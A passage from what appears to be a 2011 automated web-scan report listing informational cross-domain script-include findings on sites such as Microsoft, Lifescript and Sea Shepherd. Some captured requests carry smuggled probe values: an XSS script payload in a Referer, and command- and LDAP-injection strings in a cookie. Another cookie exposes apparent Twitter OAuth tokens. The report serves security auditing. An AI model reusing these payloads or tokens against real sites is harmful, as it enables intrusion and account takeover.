User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Jul 2011 19:02:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 27871

<html>
   <base href="http://www.jackhenry.com/"/>
   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
   <head><title>
   Jack Henry Corporate
</title><link href="includes/global.css" re
...[SNIP]...
</script>
<script language="JavaScript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...

19.79. http://www.jackhenrybanking.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.jackhenrybanking.com
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://www.googleadservices.com/pagead/conversion.js

Request

GET / HTTP/1.1
Host: www.jackhenrybanking.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.jackhenry.com/

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 19:10:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 26789

<html>
   <base href="http://www.jackhenrybanking.com/"/>
   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
   <head><title>
   Jack Henry Banking
</title><link href="includes/global.cs
...[SNIP]...
</script>
<script language="JavaScript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...

19.80. http://www.lifescript.com/Health/Conditions/ADD/Doctor-Recommended_Tips_for_Women_with_ADHD.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.lifescript.com
Path:	/Health/Conditions/ADD/Doctor-Recommended_Tips_for_Women_with_ADHD.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://lifescript.us.intellitxt.com/intellitxt/front.asp?ipid=18057
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://poweredby.kosmix.com/external/ads/kinsert/kosmixCL.js
http://pshared.5min.com/Scripts/ThumbSeed2.js?sid=768&textLocation=1&thumbnailSize=0&width=468&height=200&title=Related%20Videos&headerTextColor=%23000000&textFGColor=%23FFFFFF&textFGColor_MO=%23FFFFFF&textBGColor=%23824A6F&textBGColor_MO=%23EA557A&fallback=0&categories=6,5,8,4,13,2,14&fallbackType=featured&wrapperToShow=titleseed
http://publishers.halogennetwork.com/audience/lifescript.js
http://s7.addthis.com/js/152/addthis_widget.js
http://scripts.chitika.net/eminimalls/amm.js
http://service.optify.net/opt.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://www.google-analytics.com/ga.js
http://www.googleadservices.com/pagead/conversion.js

Request

GET /Health/Conditions/ADD/Doctor-Recommended_Tips_for_Women_with_ADHD.aspx HTTP/1.1
Host: www.lifescript.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lifescript.com/Health/Conditions/ADD/How_to_Quiet_the_Symptoms_of_Adult_ADHD.aspx?utm_source=outbrain&utm_medium=cpc&utm_campaign=ADHD_Adult
Cookie: __utma=22852774.274049985.1311276131.1311276131.1311276131.1; __utmb=22852774.2.10.1311276131; __utmc=22852774; __utmz=22852774.1311276131.1.1.utmcsr=outbrain|utmccn=ADHD_Adult|utmcmd=cpc; __qca=P0-1418956191-1311276132113; scorecardresearch=835324677-1280137661-1311276133382; testcookie

Response

19.81. http://www.lifescript.com/Health/Conditions/ADD/How_to_Quiet_the_Symptoms_of_Adult_ADHD.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.lifescript.com
Path:	/Health/Conditions/ADD/How_to_Quiet_the_Symptoms_of_Adult_ADHD.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://lifescript.us.intellitxt.com/intellitxt/front.asp?ipid=18057
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://poweredby.kosmix.com/external/ads/kinsert/kosmixCL.js
http://pshared.5min.com/Scripts/ThumbSeed2.js?sid=768&textLocation=1&thumbnailSize=0&width=468&height=200&title=Related%20Videos&headerTextColor=%23000000&textFGColor=%23FFFFFF&textFGColor_MO=%23FFFFFF&textBGColor=%23824A6F&textBGColor_MO=%23EA557A&fallback=0&categories=6,5,8,4,13,2,14&fallbackType=featured&wrapperToShow=titleseed
http://publishers.halogennetwork.com/audience/lifescript.js
http://s7.addthis.com/js/152/addthis_widget.js
http://scripts.chitika.net/eminimalls/amm.js
http://service.optify.net/opt.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://www.google-analytics.com/ga.js
http://www.googleadservices.com/pagead/conversion.js

Request

Response

19.82. http://www.lifescript.com/Health/Conditions/ADD/Out_of_Control_It_Could_Be_ADHD.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.lifescript.com
Path:	/Health/Conditions/ADD/Out_of_Control_It_Could_Be_ADHD.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://lifescript.us.intellitxt.com/intellitxt/front.asp?ipid=18057
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://poweredby.kosmix.com/external/ads/kinsert/kosmixCL.js
http://pshared.5min.com/Scripts/ThumbSeed2.js?sid=768&textLocation=1&thumbnailSize=0&width=468&height=200&title=Related%20Videos&headerTextColor=%23000000&textFGColor=%23FFFFFF&textFGColor_MO=%23FFFFFF&textBGColor=%23824A6F&textBGColor_MO=%23EA557A&fallback=0&categories=6,5,8,4,13,2,14&fallbackType=featured&wrapperToShow=titleseed
http://publishers.halogennetwork.com/audience/lifescript.js
http://s7.addthis.com/js/152/addthis_widget.js
http://scripts.chitika.net/eminimalls/amm.js
http://service.optify.net/opt.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://www.google-analytics.com/ga.js
http://www.googleadservices.com/pagead/conversion.js

Request

GET /Health/Conditions/ADD/Out_of_Control_It_Could_Be_ADHD.aspx HTTP/1.1
Host: www.lifescript.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lifescript.com/Health/Conditions/ADD/How_to_Quiet_the_Symptoms_of_Adult_ADHD.aspx?utm_source=outbrain&utm_medium=cpc&utm_campaign=ADHD_Adult
Cookie: __utma=22852774.274049985.1311276131.1311276131.1311276131.1; __utmb=22852774.2.10.1311276131; __utmc=22852774; __utmz=22852774.1311276131.1.1.utmcsr=outbrain|utmccn=ADHD_Adult|utmcmd=cpc; __qca=P0-1418956191-1311276132113; scorecardresearch=835324677-1280137661-1311276133382; testcookie

Response

19.83. http://www.lifescript.com/adcontrol.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.lifescript.com
Path:	/adcontrol.htm

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/swfobject/2/swfobject.js

Request

Response

19.84. http://www.m86security.com/products/web_security/m86-web-filtering-reporting-suite.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.m86security.com
Path:	/products/web_security/m86-web-filtering-reporting-suite.asp

Issue detail

The response dynamically includes the following scripts from other domains:

http://munchkin.marketo.net/munchkin.js
http://t4.trackalyzer.com/trackalyze.js

Request

GET /products/web_security/m86-web-filtering-reporting-suite.asp HTTP/1.1
Host: www.m86security.com
Proxy-Connection: keep-alive
Referer: http://www.m86security.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCSCRRDTC=LLMHJFJAOFMGJEDAOMPFJKMK; __utma=211469129.1338263431.1311392988.1311392988.1311392988.1; __utmb=211469129.1.10.1311392988; __utmc=211469129; __utmz=211469129.1311392988.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:021-UFU-653&token:_mch-m86security.com-1311392987538-76177

Response

HTTP/1.1 200 OK
Date: Sat, 23 Jul 2011 03:49:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 18249
Content-Type: text/html
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>M86 Web Filteri
...[SNIP]...
</script>
<script type="text/javascript" language="javascript" src="http://t4.trackalyzer.com/trackalyze.js"></script>
...[SNIP]...
</script>

<script src="http://munchkin.marketo.net/munchkin.js" type="text/javascript"></script>
...[SNIP]...

19.85. http://www.microsoft.com/en-au/netsolutionswa/casestudies.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.microsoft.com
Path:	/en-au/netsolutionswa/casestudies.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://code.jquery.com/jquery-1.5.1.min.js

Request

Response

19.86. http://www.microsoft.com/en-us/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.microsoft.com
Path:	/en-us/default.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads1.msn.com/library/dap.js
http://code.jquery.com/jquery-1.5.1.min.js

Request

GET /en-us/default.aspx HTTP/1.1
Host: www.microsoft.com
Proxy-Connection: keep-alive
Referer: http://www.microsoft.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=b99db294605ea749842ddaca50c2f3af&HASH=94b2&LV=20115&V=3; _opt_vi_X19C7L9U=1097A557-F243-4650-B6F9-421C7E65E189; MUID=E361C23374E642C998D8ABA7166A75EC; ixpLightBrowser=0; _vis_opt_s=1%7C; s_nr=1307360954509-Repeat; WT_NVR_RU=0=msdn|technet:1=:2=; .ASPXANONYMOUS=g5rG90hmzAEkAAAAMDY4MDQ2YTgtNzVlOS00M2RmLTljMmYtZDU0NDZjZmZiNjdigDOIcfti2RfB0TjvnBWm5ZDDdIY1; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1308659407330%7D%2C%22lastinvited%22%3A1308659407330%2C%22userid%22%3A%2213086594073305308045977726579%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; UserState=Returning=False&LastVisit=06/21/2011 12:33:22&UserEBacExpression=+ 0|2 + 1|8 2|1024; MSPartner2=LogUser=fd88dce7-bc7d-4fc7-a268-4d7867c372fa&RegUser=; WT_NVR=1=online|online%26echo%20958ba620d3208f17%20b1de518eba83f9e9%26|en-us|windowsazure:2=online/help|windows/windowsintune:3=online/help/en-us|en-us/*)(sn|en-us/*)(sn|windows/business/windows-7-test-drive; mstcid=252c88bf; WRUID=0; A=I&I=AxUFAAAAAAB+CQAAAIpTytFFhH8oVryAJxM8/w!!&CS=12779V000119p0002h19p00; R=200000862-6/21/2011 7:34:30|200024632-6/4/2011 17:55:19; _opt_vi_64WS79UG=20593EEE-7467-4B38-8C32-E61C8EEBF7E3; mcI=Thu, 21 Jul 2011 12:52:07 GMT; msdn=L=1033; omniID=1306014135034_717c_5c0c_c0f0_565c9892e499; WT_FPC=id=173.193.214.243-3661456592.30151123:lv=1311268084516:ss=1311267914528; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=3479ae57-7751-4c89-8161-ba065153f2e6&Microsoft.CreationDate=07/21/2011 20:05:08&Microsoft.LastVisitDate=07/21/2011 20:38:12&Microsoft.NumberOfVisits=5&SessionCookie.Id=824E728916A81675B7F5B989F626528E; MSID=Microsoft.CreationDate=05/19/2011 01:26:30&Microsoft.LastVisitDate=07/21/2011 20:38:12&Microsoft.VisitStartDate=07/21/2011 20:05:08&Microsoft.CookieId=22aa2f89-ced8-49d1-a8ca-c4379d3e1c05&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=82&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0467-1766-8023-3891; MS0=45fae15b2a02454c857d5c6314fa56b7

Response

HTTP/1.1 200 OK
Cache-Control: public
Content-Type: text/html; charset=utf-8
Expires: Thu, 21 Jul 2011 21:04:19 GMT
Last-Modified: Fri, 15 Jul 2011 17:11:01 GMT
ETag: 634463214610000000
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
VTag: 438419942900000000
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Thu, 21 Jul 2011 20:54:18 GMT
Content-Length: 212052

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html dir="ltr" lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"
...[SNIP]...
</script><script type="text/javascript" src="http://Ads1.msn.com/library/dap.js"></script></head><body class="ltr" bi:type="hpMaster"> <script src="http://code.jquery.com/jquery-1.5.1.min.js" type="text/javascript"></script>
...[SNIP]...

19.87. http://www.microsoft.com/en-us/security_essentials/Search.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.microsoft.com
Path:	/en-us/security_essentials/Search.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://code.jquery.com/jquery-1.5.1.min.js

Request

Response

19.88. http://www.microsoft.com/en-us/security_essentials/Support.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.microsoft.com
Path:	/en-us/security_essentials/Support.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://code.jquery.com/jquery-1.5.1.min.js

Request

GET /en-us/security_essentials/Support.aspx HTTP/1.1
Host: www.microsoft.com
Proxy-Connection: keep-alive
Referer: http://www.microsoft.com/en-us/security_essentials/default.aspx?bladeFlyout=Share&f9857%22%3E%3Cscript%3Ealert%28document.location%29%3C/script%3E256ae1bee6f=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=b99db294605ea749842ddaca50c2f3af&HASH=94b2&LV=20115&V=3; _opt_vi_X19C7L9U=1097A557-F243-4650-B6F9-421C7E65E189; MUID=E361C23374E642C998D8ABA7166A75EC; ixpLightBrowser=0; _vis_opt_s=1%7C; s_nr=1307360954509-Repeat; WT_NVR_RU=0=msdn|technet:1=:2=; .ASPXANONYMOUS=g5rG90hmzAEkAAAAMDY4MDQ2YTgtNzVlOS00M2RmLTljMmYtZDU0NDZjZmZiNjdigDOIcfti2RfB0TjvnBWm5ZDDdIY1; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1308659407330%7D%2C%22lastinvited%22%3A1308659407330%2C%22userid%22%3A%2213086594073305308045977726579%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; UserState=Returning=False&LastVisit=06/21/2011 12:33:22&UserEBacExpression=+ 0|2 + 1|8 2|1024; MSPartner2=LogUser=fd88dce7-bc7d-4fc7-a268-4d7867c372fa&RegUser=; WT_NVR=1=online|online%26echo%20958ba620d3208f17%20b1de518eba83f9e9%26|en-us|windowsazure:2=online/help|windows/windowsintune:3=online/help/en-us|en-us/*)(sn|en-us/*)(sn|windows/business/windows-7-test-drive; mstcid=252c88bf; WRUID=0; A=I&I=AxUFAAAAAAB+CQAAAIpTytFFhH8oVryAJxM8/w!!&CS=12779V000119p0002h19p00; R=200000862-6/21/2011 7:34:30|200024632-6/4/2011 17:55:19; _opt_vi_64WS79UG=20593EEE-7467-4B38-8C32-E61C8EEBF7E3; mcI=Thu, 21 Jul 2011 12:52:07 GMT; msdn=L=1033; omniID=1306014135034_717c_5c0c_c0f0_565c9892e499; WT_FPC=id=173.193.214.243-3661456592.30151123:lv=1311268084516:ss=1311267914528; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=3479ae57-7751-4c89-8161-ba065153f2e6&Microsoft.CreationDate=07/21/2011 20:05:08&Microsoft.LastVisitDate=07/21/2011 20:36:01&Microsoft.NumberOfVisits=4&SessionCookie.Id=824E728916A81675B7F5B989F626528E; MSID=Microsoft.CreationDate=05/19/2011 01:26:30&Microsoft.LastVisitDate=07/21/2011 20:36:01&Microsoft.VisitStartDate=07/21/2011 20:05:08&Microsoft.CookieId=22aa2f89-ced8-49d1-a8ca-c4379d3e1c05&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=81&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0467-1766-8023-3891; MS0=45fae15b2a02454c857d5c6314fa56b7

Response

HTTP/1.1 200 OK
Cache-Control: public
Content-Type: text/html; charset=utf-8
Expires: Thu, 21 Jul 2011 20:48:06 GMT
Last-Modified: Mon, 18 Jul 2011 20:49:00 GMT
ETag: 634465937400000000
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
VTag: 279565110100000000
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Thu, 21 Jul 2011 20:38:06 GMT
Content-Length: 126012

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html dir="ltr" lang="en"><head><title>Help & How-tos | Microsoft Security E
...[SNIP]...
<body bi:type="oneMscomMaster"> <script src="http://code.jquery.com/jquery-1.5.1.min.js" type="text/javascript"></script>
...[SNIP]...

19.89. http://www.microsoft.com/en-us/security_essentials/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.microsoft.com
Path:	/en-us/security_essentials/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://code.jquery.com/jquery-1.5.1.min.js

Request

Response

19.90. http://www.myyearbook.com/advertising/default.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.myyearbook.com
Path:	/advertising/default.php

Issue detail

The response dynamically includes the following script from another domain:

http://partner.googleadservices.com/gampad/google_service.js

Request

GET /advertising/default.php?n=TribalFusion&section=None&size=728x90&site=MYB&sub=Network HTTP/1.1
Host: www.myyearbook.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://games.myyearbook.com/
Cookie: PHPSESSID=2c530ecfb8656132aeda122a7a4d2f3e; mybRegTheme=hbl; mybRegData=%5B%5D; POSTAff2Cookie=HBL; __utma=138725551.1708338480.1311271168.1311271168.1311271168.1; __utmb=138725551.1.10.1311271168; __utmc=138725551; __utmz=138725551.1311271168.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __qca=P0-1424153722-1311271168512; scorecardresearch=89164312-271382480-1311271170773; MYB_TARGET=_unknown_1000_____; __gads=ID=e4ff36fbd53734c2:T=1311271225:S=ALNI_MYXbcCfMT7-Mayo-AiWicg3ClEByg

Response

19.91. http://www.nmmlaw.com/index.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.nmmlaw.com
Path:	/index.php

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/250/addthis_widget.js

Request

Response

19.92. http://www.observer.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.observer.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://partner.googleadservices.com/gampad/google_service.js
https://apis.google.com/js/plusone.js

Request

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 17:39:39 GMT
Server: VoxCAST
Set-Cookie: w3tc_referrer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3DNew%2BYork%2BObserver; path=/
Last-Modified: Thu, 21 Jul 2011 17:39:08 GMT
X-Powered-By: W3 Total Cache/0.9.2.2
Vary: Accept-Encoding,Cookie
X-Pingback: http://www.observer.com/xmlrpc.php
X-Cache: HIT from VoxCAST
Age: 1
Content-Length: 54611
Content-Type: text/html; charset=UTF-8

<!DOCTYPE HTML>
<html dir="ltr" lang="en-US">
<head>
<script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script>

<script type="text/javascript" src="https://apis.google.com/js/plusone.js"></script>
...[SNIP]...

19.93. http://www.paloaltonetworks.com/cam/switch/index.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.paloaltonetworks.com
Path:	/cam/switch/index.php

Issue detail

The response dynamically includes the following scripts from other domains:

http://paloaltonetworks.etrigue.com/cas/esp/script.asp?id=70554
http://t3.trackalyzer.com/trackalyze.js
http://www.google-analytics.com/urchin.js

Request

Response

19.94. http://www.scmagazineus.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scmagazineus.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ch2lb.checkm8.com/adam/cm8_detect_ad.js
http://connect.facebook.net/en_US/all.js
http://dinclinx.com/?s=103&e=0&t=21&f=javascript
http://jlinks.industrybrains.com/jsct?sid=918&ct=SCMAGAZINE_ROS&num=4&layt=624x300&fmt=simp
http://scmagazineus.disqus.com/combination_widget.js?num_items=5&hide_mods=0&color=grey&default_tab=recent&excerpt_length=200
http://secure-us.imrworldwide.com/v53.js
http://static.polldaddy.com/p/5207274.js
http://widgets.twimg.com/j/2/widget.js
https://ajax.googleapis.com/ajax/libs/jquery/1.5.0/jquery.min.js

Request

GET / HTTP/1.1
Host: www.scmagazineus.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
From: VM-Web1
X-Powered-By: ASP.NET
Date: Fri, 22 Jul 2011 20:13:10 GMT
Content-Length: 77856

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:og
...[SNIP]...
<link href="/js/fancybox/jquery.fancybox-1.3.4.css?4220166151" media="screen" rel="Stylesheet" type="text/css" />
<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.5.0/jquery.min.js" type="text/javascript"></script>
...[SNIP]...
</div><script type="text/javascript" charset="utf-8" src="http://static.polldaddy.com/p/5207274.js"></script>
...[SNIP]...
</SCRIPT>
<SCRIPT LANGUAGE="JavaScript" SRC="http://ch2lb.checkm8.com/adam/cm8_detect_ad.js">
</SCRIPT>
...[SNIP]...
<div id="marchexLinks">
<script type="text/javascript" src="http://jlinks.industrybrains.com/jsct?sid=918&ct=SCMAGAZINE_ROS&num=4&layt=624x300&fmt=simp"></script>
...[SNIP]...
</div><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...
<div class="assetContainer"><script src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://scmagazineus.disqus.com/combination_widget.js?num_items=5&hide_mods=0&color=grey&default_tab=recent&excerpt_length=200"></script>
...[SNIP]...
<div class="whitepapersModule"><script type="text/javascript" src="http://dinclinx.com/?s=103&e=0&t=21&f=javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="//secure-us.imrworldwide.com/v53.js"></script>
...[SNIP]...

19.95. http://www.seashepherd.org/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.seashepherd.org
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://s7.addthis.com/js/250/addthis_widget.js
http://translate.google.com/translate_a/element.js?cb=googleTranslateElementInit
http://use.typekit.com/igo3dmx.js

Request

Response

19.96. http://www.seashepherd.org/media/js/jquery.prettyPhoto.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.seashepherd.org
Path:	/media/js/jquery.prettyPhoto.js

Issue detail

The response dynamically includes the following script from another domain:

http://platform.twitter.com/widgets.js

Request

GET /media/js/jquery.prettyPhoto.js HTTP/1.1
Host: www.seashepherd.org
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.seashepherd.org/news-and-media/2011/07/19/emergency-sos-from-captain-paul-watson-save-our-ship-1263
Cookie: ci_session=a%3A5%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%2269b50aaf8bae756f1b403cf113b52a3f%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A15%3A%22173.193.214.243%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A50%3A%22Mozilla%2F5.0+%28Windows%3B+U%3B+Windows+NT+6.1%3B+en-US%3B+rv%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1311426899%3Bs%3A20%3A%22twitter_oauth_tokens%22%3Ba%3A2%3A%7Bs%3A10%3A%22access_key%22%3Bs%3A50%3A%2217156000-5bcpafY2GPkwanVv03jLVXKS0AcBJ0Uo4HqaHsTZs%22%3Bs%3A13%3A%22access_secret%22%3Bs%3A41%3A%22ThctelECOSi7nC1iRfLr6fkveN0ahhSKhmp1eWBiY%22%3B%7D%7D906ea39ef1d54c5e3ca86c5d6ceaa14d

Response

HTTP/1.1 200 OK
Date: Sat, 23 Jul 2011 13:15:05 GMT
Server: Apache
Last-Modified: Thu, 21 Jul 2011 16:08:14 GMT
ETag: "2230280-8715-8e5f1780"
Accept-Ranges: bytes
Content-Length: 34581
X-Powered-By: PleskLin
Content-Type: application/x-javascript

/* ------------------------------------------------------------------------
   Class: prettyPhoto
   Use: Lightbox clone for jQuery
   Author: Stephane Caron (http://www.no-margin-for-errors.com)
   Version:
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...

19.97. http://www.seashepherd.org/news-and-media/2011/07/19/emergency-sos-from-captain-paul-watson-save-our-ship-1263 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.seashepherd.org
Path:	/news-and-media/2011/07/19/emergency-sos-from-captain-paul-watson-save-our-ship-1263

Issue detail

The response dynamically includes the following scripts from other domains:

http://s7.addthis.com/js/250/addthis_widget.js
http://translate.google.com/translate_a/element.js?cb=googleTranslateElementInit
http://use.typekit.com/igo3dmx.js

